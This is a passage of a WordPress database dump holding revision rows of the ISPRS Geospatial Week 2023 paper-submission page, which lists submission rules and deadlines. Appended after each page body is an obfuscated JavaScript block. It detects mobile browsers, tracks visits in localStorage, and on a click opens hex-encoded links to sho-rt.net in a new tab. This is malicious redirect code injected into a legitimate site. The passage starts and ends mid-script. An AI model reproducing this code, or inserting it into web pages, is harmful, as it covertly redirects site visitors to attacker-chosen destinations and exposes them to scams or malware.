g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 09:05:10','2023-02-05 09:05:10','',2659,'https://gsw2023.com/?p=3787',0,'revision','',0),
(3788,1,'2023-02-05 09:06:53','2023-02-05 09:06:53','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 09:06:53','2023-02-05 09:06:53','',2659,'https://gsw2023.com/?p=3788',0,'revision','',0),
(3789,1,'2023-02-05 09:07:15','2023-02-05 09:07:15','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 